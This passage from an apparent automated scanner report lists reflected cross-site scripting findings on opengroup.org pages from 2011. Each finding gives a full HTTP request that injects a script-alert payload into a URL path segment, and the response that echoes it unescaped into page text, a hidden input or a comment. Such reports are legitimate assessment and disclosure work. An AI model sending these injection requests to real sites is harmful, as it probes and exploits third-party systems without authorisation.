
Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:19 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5240

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.htmlc201c<script>alert(1)</script>1e4c0cf0ddd<br>
...[SNIP]...

1.29. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d10a"><script>alert(1)</script>69f209beaf5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch/toc2.html3d10a"><script>alert(1)</script>69f209beaf5 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:17 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch/toc2.html3d10a"><script>alert(1)</script>69f209beaf5">
...[SNIP]...

1.30. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 45f60--><script>alert(1)</script>50e39303b85 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch/toc2.html45f60--><script>alert(1)</script>50e39303b85 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:22 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/arch/toc2.html45f60--><script>alert(1)</script>50e39303b85 -->
...[SNIP]...

1.31. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a706<script>alert(1)</script>4139a5bd8a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture8a706<script>alert(1)</script>4139a5bd8a2/togaf8-doc/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:01 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture8a706<script>alert(1)</script>4139a5bd8a2/togaf8-doc/arch/welcome.html<br>
...[SNIP]...

1.32. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1879c"><script>alert(1)</script>f5899df6f60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture1879c"><script>alert(1)</script>f5899df6f60/togaf8-doc/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:59 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture1879c"><script>alert(1)</script>f5899df6f60/togaf8-doc/arch/welcome.html">
...[SNIP]...

1.33. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7c3a5--><script>alert(1)</script>63e2aa5d122 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture7c3a5--><script>alert(1)</script>63e2aa5d122/togaf8-doc/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:04 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5258

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture7c3a5--><script>alert(1)</script>63e2aa5d122/togaf8-doc/arch/welcome.html -->
...[SNIP]...

1.34. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 900bf"><script>alert(1)</script>c420b677f70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc900bf"><script>alert(1)</script>c420b677f70/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:13 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc900bf"><script>alert(1)</script>c420b677f70/arch/welcome.html">
...[SNIP]...

1.35. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload f63af--><script>alert(1)</script>21768ec9add was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-docf63af--><script>alert(1)</script>21768ec9add/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:19 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5258

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-docf63af--><script>alert(1)</script>21768ec9add/arch/welcome.html -->
...[SNIP]...

1.36. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ae1c<script>alert(1)</script>3bd409f1f54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc9ae1c<script>alert(1)</script>3bd409f1f54/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:16 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc9ae1c<script>alert(1)</script>3bd409f1f54/arch/welcome.html<br>
...[SNIP]...

1.37. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 527ca<script>alert(1)</script>e5d8b004316 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch527ca<script>alert(1)</script>e5d8b004316/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:25 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch527ca<script>alert(1)</script>e5d8b004316/welcome.html<br>
...[SNIP]...

1.38. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c280c"><script>alert(1)</script>38d7c8bfaea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/archc280c"><script>alert(1)</script>38d7c8bfaea/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:24 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/archc280c"><script>alert(1)</script>38d7c8bfaea/welcome.html">
...[SNIP]...

1.39. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload f2eb2--><script>alert(1)</script>ee53edf7a8a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/archf2eb2--><script>alert(1)</script>ee53edf7a8a/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:27 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5258

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/archf2eb2--><script>alert(1)</script>ee53edf7a8a/welcome.html -->
...[SNIP]...

1.40. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload edccf--><script>alert(1)</script>e2b2ebfe22e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch/welcome.htmledccf--><script>alert(1)</script>e2b2ebfe22e HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:37 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5258

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/arch/welcome.htmledccf--><script>alert(1)</script>e2b2ebfe22e -->
...[SNIP]...

1.41. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4cc01<script>alert(1)</script>f89e7409842 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch/welcome.html4cc01<script>alert(1)</script>f89e7409842 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:33 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html4cc01<script>alert(1)</script>f89e7409842<br>
...[SNIP]...

1.42. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d70d"><script>alert(1)</script>bb423776bcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch/welcome.html1d70d"><script>alert(1)</script>bb423776bcc HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:32 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch/welcome.html1d70d"><script>alert(1)</script>bb423776bcc">
...[SNIP]...

1.43. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78a8a<script>alert(1)</script>749c6a7fac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /events78a8a<script>alert(1)</script>749c6a7fac/sponsor-exhibit.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.3.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:07 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5143

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/events78a8a<script>alert(1)</script>749c6a7fac/sponsor-exhibit.htm<br>
...[SNIP]...

1.44. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /events/sponsor-exhibit.htm

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 1cf72--><script>alert(1)</script>d544780bb6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /events1cf72--><script>alert(1)</script>d544780bb6c/sponsor-exhibit.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
